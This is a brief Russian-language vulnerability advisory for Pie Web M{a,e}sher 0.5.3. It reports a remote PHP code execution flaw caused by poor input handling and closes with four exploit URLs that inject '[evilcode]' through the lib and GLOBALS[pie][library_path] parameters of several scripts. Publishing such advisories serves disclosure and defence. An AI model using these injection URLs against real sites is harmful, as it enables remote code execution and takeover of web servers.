Программа: Pie Web M{a,e}sher 0.5.3
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных множественными сценариями. Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит:
http://localhost/[path]/lib/action/alias.php?lib=[evilcode]
http://localhost/[path]/lib/class/diff.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/libcompiler/html.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/lib/share/auth.php?GLOBALS[pie][library_path]=[evilcode]